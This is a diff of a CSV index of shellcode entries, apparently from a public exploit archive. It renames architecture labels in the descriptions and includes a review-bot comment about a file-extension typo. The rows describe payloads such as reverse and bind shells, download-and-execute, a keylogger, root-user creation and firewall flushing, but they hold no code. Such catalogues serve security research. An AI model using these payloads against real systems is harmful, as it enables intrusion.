40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA() Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
@ -755,34 +755,35 @@ id,file,description,date,author,type,platform
43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41439,shellcodes/linux_x86-64/41439.c,"Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
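Review bot: the file path for 41510 reads `shellcodes/linux_x86-64/41510.nsam` in both the old and the renamed row, while its neighbours 41498, 41503 and 41509 all use `.nasm`. Since this change already rewrites that row's description, confirm whether the extension is a transposition; if it is, correct the path here and rename the file in the same commit so the CSV and the tree stay in step.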
@ -792,8 +793,8 @@ id,file,description,date,author,type,platform
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
@ -817,46 +818,46 @@ id,file,description,date,author,type,platform
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
